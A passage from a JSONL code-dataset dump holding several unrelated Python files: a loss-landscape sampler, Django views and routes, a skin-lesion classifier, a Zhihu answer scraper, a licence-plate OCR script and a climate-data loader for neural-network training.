each layer direction has\n # the unit norm.\n direction.div_(direction.norm())\n\n @staticmethod\n def normalize_for_weights(direction, weights, norm='filter', ignore='biasbn'):\n \"\"\"\n The normalization scales the direction entries according to the entries of weights.\n \"\"\"\n assert(len(direction) == len(weights))\n for d, w in zip(direction, weights):\n if d.dim() <= 1:\n if ignore == 'biasbn': d.fill_(0) # ignore directions for weights with 1 dimension\n else: d.copy_(w) # keep directions for weights/bias that are only 1 per node\n else:\n Direction._normalize(d, w, norm)\n \n @staticmethod\n def create_random_direction(params, ignore='biasbn', norm=True, norm_type='filter'):\n \"\"\"\n Setup a random (normalized) direction with the same dimension as\n the weights or states.\n\n Args:\n net: the given trained model\n dir_type: 'weights' or 'states', type of directions.\n ignore: 'biasbn', ignore biases and BN parameters.\n norm: direction normalization method, including\n 'filter\" | 'layer' | 'weight' | 'dlayer' | 'dfilter'\n\n Returns:\n direction: a random direction with the same dimension as weights or states.\n \"\"\"\n\n # random direction\n weights_data = [p.data for p in params] # a list of parameters.\n direction = [torch.randn(w.size()) for w in params]\n if norm:\n Direction.normalize_for_weights(direction, 
weights_data, norm_type, ignore)\n return direction\n \n @staticmethod\n def set_weights(net, weights, directions=None, step=None):\n \"\"\"\n Overwrite the network's weights with a specified list of tensors\n or change weights along directions with a step size.\n \"\"\"\n if directions is None:\n # You cannot specify a step length without a direction.\n for (p, w) in zip(net.parameters(), weights):\n p.data.copy_(w.type(type(p.data)))\n else:\n assert step is not None, 'If a direction is specified then step must be specified as well'\n if len(directions) == 2:\n dx = directions[0]\n dy = directions[1]\n # self.logger.info(dx)\n # self.logger.info(len(dx), len(dy))\n changes = [d0*step[0] + d1*step[1] for (d0, d1) in zip(dx, dy)]\n else:\n changes = [d*step for d in directions[0]]\n # self.logger.info('change norm', torch.norm(proj.tensorlist_to_tensor(changes)))\n # self.logger.info(torch.norm(proj.tensorlist_to_tensor(changes)))\n\n for (p, w, d) in zip(net.parameters(), weights, changes):\n s = w + d.to(w.device)\n p.data = s\n \n @staticmethod\n def save(direction, h5_file, name):\n # Create the plotting directions\n write_list(h5_file, name, direction)\n\n def load(h5_file, name):\n # Create the plotting directions\n return read_list(h5_file, name)\n \n @staticmethod\n def to_tensor(dir, **kwargs):\n return [torch.tensor(arr, **kwargs) for arr in dir]\n\nclass Dir2D(object):\n def __init__(self, model=None, dirs = None, mode='random') -> None:\n super().__init__()\n if model is not None:\n weights = get_weights_as_list(model) # List representation\n dir0 = Direction.create_random_direction(weights, norm_type='layer')\n dir1 = Direction.create_random_direction(weights, norm_type='layer')\n self._dir = (dir0, dir1)\n # Todo: Assert these dir are othorgonal\n elif dirs is not None and len(dirs) == 2:\n self._dir = dirs\n \n\n def save(self, h5file):\n Direction.save(self[0], h5file, 'xdir')\n Direction.save(self[1], h5file, 'ydir')\n\n\n @classmethod\n def load(cls, h5file):\n dir0 = Direction.load(h5file, 'xdir')\n dir1 = Direction.load(h5file, 'ydir')\n return cls(dirs=(dir0, dir1))\n\n def __getitem__(self, dir_index):\n return self._dir[dir_index]\n \n def __len__(self):\n return len(self._dir)\n \n def to_tensor(self, **kwargs):\n self.tensors = (Direction.to_tensor(self._dir[0], **kwargs), \n Direction.to_tensor(self._dir[1], **kwargs))\n \n def tensor(self, dir_index):\n return self.tensors[dir_index]\n \n\nclass Surface:\n def __init__(self, path_dir2d, rect, resolution, path, layers) -> None:\n with h5py.File(path_dir2d) as f:\n self.dirs = Dir2D.load(f)\n self.dir_path = path_dir2d\n xmin, ymin, xmax, ymax = rect\n xnum, ynum = int(resolution[0]), int(resolution[1])\n self.xcoord = np.linspace(xmin, xmax, num=xnum)\n self.ycoord = np.linspace(ymin, ymax, num=ynum)\n self.shape = (xnum, ynum)\n self.path = path\n self.h5_file = None\n self.layers = layers\n\n def add_layer(self, *names, value=-1):\n for name in names:\n self.layers[name] = np.ones(self.shape)*value\n\n def mesh(self):\n return np.meshgrid(self.xcoord, self.ycoord)\n\n def save(self, mode='w-'):\n f = h5py.File(self.path, mode) # Create file, fail if exists\n f.attrs['dir_path'] = self.dir_path\n f['xcoord'] = self.xcoord \n f['ycoord'] = self.xcoord\n layer_grp = f.create_group('layers')\n for name, values in self.layers.items():\n layer_grp.create_dataset(name, data=values)\n f.close()\n \n @classmethod\n def load(cls, path):\n f = h5py.File(path, 'r')\n direction_path = f.attrs['dir_path']\n xcoord = 
f['xcoord'][:]\n ycoord = f['ycoord'][:]\n layer_grp = f['layers']\n layers = {}\n for name, values in layer_grp.items():\n layers[name] = values[:]\n obj = cls(direction_path, (0, 0, 0, 0), (0, 0), path, layers)\n obj.xcoord = xcoord\n obj.ycoord = ycoord\n f.close()\n return obj\n \n def get_unplotted_indices(self, layer):\n \"\"\"\n Args:\n layer: layer name, with value -1 when the value is not yet calculated.\n\n Returns:\n - a list of indices into vals for points that have not yet been calculated.\n - a list of corresponding coordinates, with one x/y coordinate per row.\n \"\"\"\n\n # Create a list of indices into the vectorizes vals\n vals = self.layers[layer]\n inds = np.array(range(vals.size))\n\n # Select the indices of the un-recorded entries, assuming un-recorded entries\n # will be smaller than zero. In case some vals (other than loss values) are\n # negative and those indexces will be selected again and calcualted over and over.\n inds = inds[vals.ravel() <= 0]\n\n # Make lists containing the x- and y-coodinates of the points to be plotted\n # If the plot is 2D, then use meshgrid to enumerate all coordinates in the 2D mesh\n xcoord_mesh, ycoord_mesh = self.mesh()\n s1 = xcoord_mesh.ravel()[inds]\n s2 = ycoord_mesh.ravel()[inds]\n return inds, np.c_[s1,s2]\n\n def open(self, mode):\n self.h5_file = h5py.File(self.path, mode)\n \n def flush(self):\n assert self.h5_file, 'Have yet open'\n self.h5_file.flush()\n\n def close(self):\n assert self.h5_file, 'Have yet open'\n self.h5_file.close()\n\nclass Sampler:\n def __init__(self, model, surface, layer_names, device, comm=None, rank=-1, logger=None) -> None:\n self.model = model\n self.surface = surface\n self.rank = rank\n self.device = device\n self.layer_names = layer_names\n self.comm = comm\n self.logger = logger\n\n def prepair(self):\n # if rank == 0: self.surface.open('r+')\n self.surface.dirs.to_tensor()\n # Generate a list of indices of 'losses' that need to be filled in.\n # The coordinates of each unfilled index (with respect to the direction vectors\n # stored in 'd') are stored in 'coords'.\n # inds, coords, inds_nums = scheduler.get_job_indices(*surface.get_unplotted_indices(loss_key), rank, size)\n self.layers = [self.surface.layers[name] for name in self.layer_names]\n self.layers_fl = [layer.ravel() for layer in self.layers]\n model = self.model\n model.eval()\n # model.to(self.device)\n \n def reduce(self):\n # Send updated plot data to the master node\n if self.rank < 0: return 0\n syc_start = time.time()\n for layer in self.layers_fl:\n # dist.reduce(layer, 0, op=dist.ReduceOp.MAX)\n mpi.reduce_max(self.comm, layer)\n syc_time = time.time() - syc_start\n return syc_time\n \n \n def write(self):\n # Only the master node writes to the file - this avoids write conflicts\n if self.rank <= 0:\n for name, layer in zip(self.layer_names, self.layers):\n self.surface.h5_file['layers'][name][:] = layer\n self.surface.flush()\n\n def run(self, evaluation, inds, coords, inds_nums):\n \"\"\"\n Calculate the loss values and accuracies of modified models in parallel\n using MPI reduce.\n \"\"\"\n # dirs_tensor = (proj.tensorlist_to_tensor(directions[0]), proj.tensorlist_to_tensor(directions[1]))\n self.logger.info('Computing %d values for rank %d'% (len(inds), self.rank))\n start_time = time.time()\n total_sync = 0.0\n with torch.no_grad():\n model = self.model\n weights = [torch.clone(p) for p in model.parameters()]\n # Loop over all uncalculated loss values\n for count, ind in enumerate(inds):\n # Get the coordinates of the 
loss value being calculated\n coord = coords[count]\n Direction.set_weights(model, weights, self.surface.dirs.tensors, coord)\n # Record the time to compute the loss value\n loss_start = time.time()\n values = evaluation(model)\n loss_compute_time = time.time() - loss_start\n # Record the result in the local array\n for i, val in enumerate(values):\n self.layers_fl[i][ind] = val\n\n syc_time = self.reduce()\n total_sync += syc_time\n self.write()\n\n log_values = '\\t'.join(['{}={:.3f}'.format(name, val) for name, val in zip(self.layer_names, values)])\n self.logger.info('Evaluating rank %d %d/%d (%.1f%%) coord=%s \\t%s \\ttime=%.2f \\tsync=%.2f' % (\n self.rank, count, len(inds), 100.0 * count/len(inds), str(coord), log_values, loss_compute_time, syc_time))\n\n # This is only needed to make MPI run smoothly. If this process has less work than\n # the rank0 process, then we need to keep calling reduce so the rank0 process doesn't block\n for i in range(max(inds_nums) - len(inds)):\n self.reduce()\n\n total_time = time.time() - start_time\n self.logger.info('Rank %d done! Total time: %.2f Sync: %.2f' % (self.rank, total_time, total_sync))\n \n# def main():\n# model = None\n# surface = Surface.load(path)\n# loss_key = ('loss', 'acc')\n# inds, coords, inds_nums = scheduler.get_job_indices(*surface.get_unplotted_indices('loss'), 0, 1)\n# surface.open('r+')\n# sampler = Sampler(model, surface, loss_key,'gpu:0', 0)\n# sampler.prepair()\n# sampler.run(evaluation, inds, coords, inds_nums)\n# surface.close()\n","sub_path":"lib/viztool/landscape.py","file_name":"landscape.py","file_ext":"py","file_size_in_byte":14568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197736064","text":"from django.urls import path\n\nfrom . import views\napp_name = 'todo_demo'\nurlpatterns = [\n path('',views.index, name = 'index'),\n path('todoitem/',views.TodoItemFunc, name = 'TodoItem'),\n path('add/',views.add,name = 'add'),\n path('/edit/',views.edit,name = 'edit'),\n path('save/',views.save,name = 'save'),\n path('/delete/',views.delete,name = 'delete'),\n\n]\n","sub_path":"contactandtodo/todo_demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"285564346","text":"import os\nimport re\nimport glob\nimport base64\nfrom django.shortcuts import render\n\nglobalIncrement = -1\nglobalFileNameIncrement = 1;\nimages = ('80001-English-13.png','80001-English-14.png','80001-English-15.png')\n\n# Create your views here.\ndef Index(request):\n\n global globalIncrement\n global globalFileNameIncrement\n image_data = request.POST.get('image_data')\n\n imagesxList = [os.path.basename(x) for x in glob.glob(\"Evaluation/static/imagesx/*\")]\n image_name = images[globalIncrement]\n\n if(image_data != 'Empty' and image_data != None):\n image_data = re.sub(\"^data:image/png;base64,\",\"\",image_data)\n image_data = base64.b64decode(image_data)\n\n for imagesxName in imagesxList:\n if (image_name == imagesxName):\n image_name = image_name.split('.')\n image_name = image_name[0] + '_' + str(globalFileNameIncrement) + '.' 
+ image_name[1]\n globalFileNameIncrement = globalFileNameIncrement + 1\n\n with open(\"Evaluation/static/imagesx/\"+image_name,'wb') as f:\n f.write(image_data)\n\n if (request.POST.get('next')):\n globalIncrement = globalIncrement + 1\n\n if (request.POST.get('previous')):\n globalIncrement = globalIncrement - 1\n\n if (globalIncrement >= len(images)):\n globalIncrement = 0;\n\n if (globalIncrement < 0):\n globalIncrement = 0;\n\n return render(request, '../templates/QuestionEvaluation.html', {'image': images[globalIncrement]})\n","sub_path":"Evaluation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"211928873","text":"#!/usr/bin/env python\n\ncnt = int(open('options').read().split('\\n')[2].split()[1])\n\nout_file = open('result', 'w')\nfor i in range(cnt,-1,-1):\n\tfor line in open(str(i)):\n\t\tif 'GC calls:' in line:\n\t\t\tout_file.write('%d\\t' % (cnt-i) + line.split()[2] + '\\n')\n\t\t\tbreak\nout_file.close()\n","sub_path":"data/test/old_parser.py","file_name":"old_parser.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"255997989","text":"import keras\r\nfrom keras.preprocessing import image\r\nfrom glob import glob\r\nimport cv2, os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\npath = r'C:\\Users\\Abhijeet\\Desktop\\Skin dataset\\data\\train\\benign'\r\npath1 = r'C:\\Users\\Abhijeet\\Desktop\\Skin dataset\\data\\train\\malignant'\r\nROW, COL = 96, 96\r\nbenigns, malignants = [], []\r\ny_benigns, y_malignants = [], []\r\n\r\ndef load_benigns():\r\n print('Loading all benign images\\n')\r\n benign_path = os.path.join(path, '*g')\r\n for benign_img in glob(benign_path):\r\n benign = cv2.imread(benign_img)\r\n benign = cv2.cvtColor(benign, cv2.COLOR_BGR2GRAY)\r\n benign = cv2.resize(benign, (ROW, COL))\r\n benign = image.img_to_array(benign)\r\n benigns.append(benign)\r\n print('All benign images loaded')\r\n \r\n\r\nload_benigns()\r\ndef load_malignants():\r\n print('Loading all malignant images\\n')\r\n malignant_path = os.path.join(path1, '*g')\r\n for malignant_img in glob(malignant_path):\r\n malignant = cv2.imread(malignant_img)\r\n malignant = cv2.cvtColor(malignant, cv2.COLOR_BGR2GRAY)\r\n malignant = cv2.resize(malignant, (ROW, COL))\r\n malignant = image.img_to_array(malignant)\r\n malignants.append(malignant)\r\n print('All malignant images loaded')\r\nload_malignants()\r\n\r\ny_benigns = [1 for item in enumerate(benigns)]\r\ny_malignants = [0 for item in enumerate(malignants)]\r\n\r\n\r\nbenigns = np.asarray(benigns).astype('float32')\r\nmalignants = np.asarray(malignants).astype('float32')\r\ny_benigns = np.asarray(y_benigns).astype('int32')\r\ny_malignants = np.asarray(y_malignants).astype('int32')\r\nbenigns /= 255\r\nmalignants /= 255\r\n\r\nX = np.concatenate((benigns,malignants), axis=0)\r\ny = np.concatenate((y_benigns, y_malignants), axis=0)\r\n\r\nX = X.reshape(2637,96*96)\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nX_train = sc.fit_transform(X_train)\r\nX_test = sc.transform(X_test)\r\n\r\n# Fitting Random Forest Classification to the Training set\r\nfrom sklearn.ensemble import 
RandomForestClassifier\r\nclassifier = RandomForestClassifier(n_estimators = 10, criterion = 'entropy', random_state = 0)\r\nclassifier.fit(X_train, y_train)\r\n\r\n# Predicting the Test set results\r\ny_pred = classifier.predict(X_test)\r\n\r\n# Making the Confusion Matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(y_test, y_pred)\r\n\r\nimport pickle\r\n\r\n# save\r\nwith open('modelrandomforest.pkl','wb') as f4:\r\n pickle.dump(classifier,f4)\r\n\r\n# load\r\nwith open('modelrandomforest.pkl', 'rb') as f4:\r\n clf4 = pickle.load(f4)\r\n\r\n","sub_path":"RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"98480643","text":"#!/usr/bin/env python3\n\n# A basic example of using BlueInterface for gripper control.\n# It allows a user to open and close the gripper.\n\nimport sys\nfrom blue_interface import BlueInterface\nimport numpy as np\nimport consts\n\nif __name__ == '__main__':\n blue = BlueInterface(consts.default_arm, consts.default_address) #creates object of class KokoInterface at the IP in quotes with the name 'blue'\n opened = True\n try:\n while True:\n input(\"Press enter to open/close the gripper. To exit, press .\")\n\n if opened:\n blue.command_gripper(-1.5,20.0)\n print(\"Closing...\")\n else:\n blue.command_gripper(0.0,10.0)\n print(\"Opening...\")\n opened = not opened\n except:\n pass\n\n blue.disable_control()\n blue.shutdown()\n\n","sub_path":"demos/gripper_controller.py","file_name":"gripper_controller.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"199716797","text":"import re\r\n\r\ndef __decode_entity_references_into_utf8(entity_references):\r\n num_list = re.findall(r'\\&#(\\d+);',entity_references)\r\n \r\n code = 0\r\n for n in num_list:\r\n if code == 0:\r\n code = int(n)\r\n else:\r\n code = code << 8 | int(n)\r\n\r\n if len(num_list) == 1:\r\n char = chr(code)\r\n else:\r\n char = code.to_bytes(len(num_list),'big').decode('utf-8')\r\n \r\n return char\r\n\r\ndef __make_mojibake_char(entity_references):\r\n num_list = re.findall(r'\\&#(\\d+);',entity_references)\r\n \r\n for n in num_list:\r\n print('_{}'.format(chr(int(n))))\r\n\r\ndef __get_entity_references(html):\r\n return re.findall(r'((?:\\&#\\d+;)+)',html)\r\n\r\ndef __get_dict_of_entity_reference_and_utf8(ref_list):\r\n utf8_dict = {}\r\n for ref in ref_list:\r\n char = __decode_entity_references_into_utf8(ref)\r\n\r\n # convert nbsp into space\r\n if char == '\\xa0':\r\n char = ' '\r\n\r\n utf8_dict[ref] = char\r\n \r\n return utf8_dict\r\n\r\n\r\ndef change_entity_references_to_utf8_in_text(text):\r\n ref_list = __get_entity_references(text)\r\n utf8_dict = __get_dict_of_entity_reference_and_utf8(ref_list)\r\n\r\n replace_text = text\r\n for ref, utf8 in utf8_dict.items():\r\n replace_text = replace_text.replace(ref, utf8)\r\n \r\n return replace_text\r\n\r\nif __name__=='__main__':\r\n \r\n html = '''
The three-dimensional structures of chromosomes are increasingly being recognized\r\n    as playing a major role in cellular regulatory states. The efficiency and promiscuity\r\n    of phage Mu transposition was exploited to directly measure\r\n    in vivo interactions between genomic loci in\r\n    E. coli. Two global organizing principles have emerged: first, the chromosome is well-mixed\r\n    and uncompartmentalized, with transpositions occurring freely between all measured\r\n    loci; second, several gene families/regions show &#226;&#128;&#156;clustering&#226;&#128;&#157;: strong three-dimensional\r\n    co-localization regardless of linear genomic distance. The activities of the SMC/condensin\r\n    protein MukB and nucleoid-compacting protein subunit HU-&#206;&#177; are essential for the well-mixed\r\n    state; HU-&#206;&#177; is also needed for clustering of 6/7 ribosomal RNA-encoding loci. The\r\n    data are explained by a model in which the chromosomal structure is driven by dynamic\r\n    competition between DNA replication and chromosomal relaxation, providing a foundation\r\n    for determining how region-specific properties contribute to both chromosomal structure\r\n    and gene regulation.\r\n    
'''\r\n \r\n ref_list = __get_entity_references(html)\r\n utf8_dict = __get_dict_of_entity_reference_and_utf8(ref_list)\r\n","sub_path":"src/entity_references.py","file_name":"entity_references.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"575837131","text":"from src.program import controller_commands\nfrom src.terminal import ITerminal as terminal\n\n\nclass Navigator:\n def __init__(self, *args, **kwargs):\n self.controller_commands = controller_commands\n\n def wait_for_command(self):\n last = len(self.controller_commands) - 1\n self.controller_commands[last].commands[0].run()\n while True:\n command = terminal.read_command()\n self.navigate(command)\n\n def navigate(self, command):\n called = False\n command_arguments = ('%s' % command).split(' ', 1)\n command = ('%s' % command_arguments[0]).strip()\n arguments = ''\n try:\n arguments = ('%s' % command_arguments[1]).strip()\n except:\n pass\n for cc in self.controller_commands:\n for c in cc.commands:\n if not called and c.call_name == command:\n c.run(arguments)\n called = True\n if not called:\n terminal.error('Command not found')\n\n\nINavigator = Navigator()\n","sub_path":"src/navigator.py","file_name":"navigator.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"222301595","text":"\nimport requests\nimport json\nimport csv\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nimport random\n\ncount = 1\n\nurl = 'https://www.zhihu.com/api/v4/questions/28997505/answers'\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'\n}\n\n\ndef open_url(url):\n try:\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n return response.text\n else:\n return None\n except Exception as e:\n print(e)\n return None\n\n# json.loads() change to dict\n\n\ndef parse_json(data):\n res = json.loads(data)\n\n print(res, 'res')\n\n global count\n\n for an in res['data']:\n if an['type'] == 'answer':\n # question = an['question']['title']\n # soup = BeautifulSoup(an['content'],\n # features='html.parser')\n\n # answer = soup.text.strip().replace('\\n', '。')\n # vote = an['target']['voteup_count']\n\n # get user\n name = an['author']['name']\n headline = an['author']['headline']\n gender = an['author']['gender']\n write_user_csv(\n {'name': name, 'headline': headline, 'gender': gender})\n count += 1\n\n return get_next_url(res)\n\n\ndef get_next_url(res):\n try:\n if not res['paging']['is_end']:\n url = res['paging']['next']\n write_url_csv(res['paging'])\n return url\n else:\n return None\n except Exception as e:\n print(e)\n return None\n\n\ndef write_url_csv(item):\n with open('url.csv', 'a', encoding='utf_8_sig', newline='') as f:\n fieldnames = ['is_start', 'is_end', 'previous', 'next', 'totals']\n w = csv.DictWriter(f, fieldnames=fieldnames)\n w.writerow(item)\n\n\ndef write_user_csv(item):\n with open('user.csv', 'a', encoding='utf_8_sig', newline='') as f:\n fieldnames = ['name', 'headline', 'gender']\n w = csv.DictWriter(f, fieldnames=fieldnames)\n w.writerow(item)\n\n\nif __name__ == \"__main__\":\n count = 1\n\n while True:\n try:\n data = open_url(url)\n if data:\n url = parse_json(data)\n if not url:\n print('end')\n break\n except Exception as e:\n print(e)\n 
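# Throttle between page fetches: the random 0-3 s pause below is the crawler's only\n        # rate-limiting, and the loop exits normally only when get_next_url() sees is_end and\n        # returns None. A longer pause, e.g. sleep(3 + random.random()*3), is a plausible\n        # (hypothetical) tweak if the API starts rejecting requests.\n        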
sleep(random.random()*3)\n","sub_path":"requests/zhihu/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"559451423","text":"import cv2\r\nimport pytesseract\r\nimport numpy as np\r\nimport imutils\r\n\r\nimg = cv2.imread(\"licence_plate.jpg\")\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\nfiltered = cv2.bilateralFilter(gray, 6, 250, 250)\r\nedged = cv2.Canny(filtered, 30, 200)\r\ncontours = cv2.findContours(edged, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\ncnts = imutils.grab_contours(contours)\r\ncnts = sorted(cnts, key=cv2.contourArea, reverse=True)[0:10]  # sort the contours by area, largest first\r\nscreen = None\r\n\r\n# approximate each contour to suppress small defects\r\nfor c in cnts:\r\n    epsilon = 0.018 * cv2.arcLength(c, True)  # empirically chosen factor; arcLength gives the closed-contour perimeter\r\n    approx = cv2.approxPolyDP(c, epsilon, True)\r\n    if len(approx) == 4:  # four corners detected -> assume this is the plate\r\n        screen = approx\r\n        break\r\n\r\nmask = np.zeros(gray.shape, np.uint8)\r\nnew_image = cv2.drawContours(mask, [screen], 0, (255, 255, 255), -1)  # everything outside the plate black, the plate white\r\nnew_image = cv2.bitwise_and(img,img,mask = mask)  # keep only the plate pixels\r\n\r\n\r\n\r\n# crop the plate region\r\n(x,y) = np.where(mask == (255))\r\n(topx,topy) = (np.min(x),np.min(y))\r\n(bottomx,bottomy) =(np.max(x),np.max(y))\r\ncropped = gray[topx:bottomx +1,topy:bottomy+1]\r\n\r\n\r\ntext = pytesseract.image_to_string(cropped,lang=\"eng\")\r\nprint(\"detected_plate\",text)\r\n\r\ncv2.imshow(\"original\",img)\r\ncv2.imshow(\"gray\",gray)\r\ncv2.imshow(\"filtered\",filtered)\r\ncv2.imshow(\"edged\",edged)\r\ncv2.imshow(\"new_image\", cropped)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"licence_plate_detection.py","file_name":"licence_plate_detection.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"21499919","text":"import xarray as xr\nimport pandas as pd\nimport numpy as np\n\ndef load_day(day, no_NNs, path, data_source='narval', resolution_narval='R02B04'):\n    '''\n    Load the data for a given day from path. The data is saved in a folder-per-variable manner.\n    This function returns an array of dataframes, where each dataframe corresponds to a specific vertical layer.\n    \n    Parameters:\n        day (string): Which day's data to load (YYYYMMDD00 for narval, YYYYMMDD for qubicc)\n        no_NNs (int): How many NNs we want to train (= one per vertical layer)\n        path (string): Path to the data\n        data_source (string): 'narval' or 'qubicc'\n        resolution_narval: 'R02B04' or 'R02B05'. 
Affects which fr_lake file is loaded.\n \n Returns:\n dfs: An array of no_NNs many dataframes, each providing training data for clc on a specific vertical layer\n '''\n day = str(day) # In case it wasn't passed as a string\n \n # Create DataFrame for loaded data\n if data_source == 'narval':\n vars_3d = ['qv', 'qc', 'qi', 'temp', 'pres', 'rho', 'zg']\n # vars_2d = ['fr_lake', 'fr_seaice']\n vars_prev = ['clc_prev']\n output = ['clc']\n elif data_source == 'qubicc':\n vars_3d = ['hus', 'clw', 'cli', 'ta', 'pfull', 'rho', 'zg']\n # vars_2d = ['fr_lake', 'fr_seaice']\n vars_prev = ['cl_prev'] \n output = ['cl']\n vars_2d = ['fr_lake']\n columns = [] \n for s in vars_3d:\n columns.append(s+'_i-2')\n columns.append(s+'_i-1')\n columns.append(s+'_i')\n columns.append(s+'_i+1')\n columns.append(s+'_i+2')\n columns.extend(vars_2d)\n columns.extend(vars_prev)\n columns.extend(output)\n \n dfs = []\n for i in range(no_NNs):\n dfs.append(pd.DataFrame(columns=columns))\n\n ## Output\n #clc\n vars = output\n for i in range(len(vars)):\n # Filenames depend on data-source\n if data_source == 'narval':\n # clc-filename narval: int_var_clc_R02B04_NARVALI_2013123100_cloud_DOM01_0036.nc\n clc_filenames = '/int_var_'+vars[i]+'_'+resolution_narval+'*'+day+'*_cloud_DOM01_00*.nc'\n elif data_source == 'qubicc':\n # cl-filename qubicc: int_var_hc2_02_p1m_cl_ml_20041110T110000Z.nc\n clc_filenames = '/int_var_hc2_02_p1m_'+vars[i]+'_ml_'+day+'*.nc'\n DS = xr.open_mfdataset(path+vars[i]+clc_filenames, combine='by_coords')\n var_array = getattr(DS, vars[i]).values\n not_nan = ~np.isnan(var_array[0,30,:]) #The surface-nearest layer 30 shall not contain NAN-values\n timesteps = var_array.shape[0] \n var_array_notnan = var_array[:,:,not_nan] #var_array_notnan.shape=25x31x1131\n # For every vertical layer we have to fill the output information of this day in the corresponding dataset\n for j in range(no_NNs):\n vert_layers = var_array.shape[1]\n # We are not interested in the uppermost layers (denoted by small indices)\n ind = vert_layers - no_NNs + j\n # We do not save the initial timestep as there is no preceding information on clc\n dfs[j][vars[i]] = np.reshape(var_array_notnan[1:,ind,:],[-1]) #shape=27144\n dfs[j][vars_prev[i]] = np.reshape(var_array_notnan[:-1,ind,:],[-1])\n \n ## Time-invariant input\n #zg\n DS = xr.open_dataset(path+'zg/zg_icon-a_capped.nc')\n var_array = DS.zg.values\n var_array_notnan = var_array[:,not_nan] #var_array_notnan.shape=31x1131\n var_array_notnan = np.repeat(np.expand_dims(var_array_notnan, 0), timesteps, axis=0) #var_array_notnan.shape=25x31x1131\n for j in range(no_NNs):\n ind = vert_layers - no_NNs + j\n dfs[j]['zg_i-2'] = np.reshape(var_array_notnan[1:,ind-2,:], [-1])\n dfs[j]['zg_i-1'] = np.reshape(var_array_notnan[1:,ind-1,:], [-1])\n dfs[j]['zg_i'] = np.reshape(var_array_notnan[1:,ind,:], [-1])\n try:\n dfs[j]['zg_i+1'] = np.reshape(var_array_notnan[1:,ind+1,:], [-1])\n dfs[j]['zg_i+2'] = np.reshape(var_array_notnan[1:,ind+2,:], [-1])\n except IndexError:\n pass\n \n #fr_lake\n if data_source == 'narval':\n DS = xr.open_dataset(path+'../grid_extpar/fr_lake_'+resolution_narval+'_NARVAL_fg_DOM01.nc')\n var_array = DS.FR_LAKE.values\n elif data_source == 'qubicc':\n DS = xr.open_dataset(path+'/fr_lake/fr_lake_'+resolution_narval+'.nc')\n var_array = DS.lake.values\n var_array = np.repeat(np.expand_dims(var_array, 0), timesteps, axis=0)\n var_array = np.repeat(np.expand_dims(var_array, 1), 31, axis=1)\n var_array_notnan = var_array[:,:,not_nan]\n for j in range(no_NNs):\n ind = 
vert_layers - no_NNs + j\n dfs[j]['fr_lake'] = np.reshape(var_array_notnan[1:,ind,:],[-1])\n \n# ## 2D input\n# #\n# vars = ['fr_seaice']\n# for i in range(len(vars)):\n# DS = xr.open_mfdataset(path+vars[i]+'/'+vars[i]+'_R02B04*'+day+'_fg_DOM01_00*.nc', \n# combine='by_coords')\n# var_array = getattr(DS, vars[i]).values\n# var_array = np.repeat(np.expand_dims(var_array, 1), 31, axis=1)\n# var_array_notnan = var_array[:,:,not_nan]\n# for j in range(no_NNs):\n# ind = vert_layers - no_NNs + j\n# dfs[j][vars[i]] = np.reshape(var_array_notnan[1:,ind,:],[-1])\n\n ## Hourly data\n #3D input\n vars = vars_3d\n vars.remove('zg')\n for i in range(len(vars)):\n # Filenames depend on data-source\n if data_source == 'narval':\n # 3d-filename narval: int_var_qc_R02B04_NARVALII_2016072800_fg_DOM01_0021.nc\n filenames = '/int_var_'+vars[i]+'_'+resolution_narval+'*'+day+'*_fg_DOM01_00*.nc'\n elif data_source == 'qubicc':\n # 3d-filename qubicc: int_var_hc2_02_p1m_clw_ml_20041110T090000Z.nc\n filenames = '/int_var_hc2_02_p1m_'+vars[i]+'_ml_'+day+'*.nc'\n DS = xr.open_mfdataset(path+vars[i]+filenames, combine='by_coords')\n if vars[i] == 'clw':\n var_array = getattr(DS, 'qclw_phy').values\n else:\n var_array = getattr(DS, vars[i]).values\n var_array_notnan = var_array[:,:,not_nan]\n for j in range(no_NNs):\n ind = vert_layers - no_NNs + j\n dfs[j][vars[i]+'_i-2'] = np.reshape(var_array_notnan[1:,ind-2,:], [-1])\n dfs[j][vars[i]+'_i-1'] = np.reshape(var_array_notnan[1:,ind-1,:], [-1])\n dfs[j][vars[i]+'_i'] = np.reshape(var_array_notnan[1:,ind,:], [-1])\n try:\n dfs[j][vars[i]+'_i+1'] = 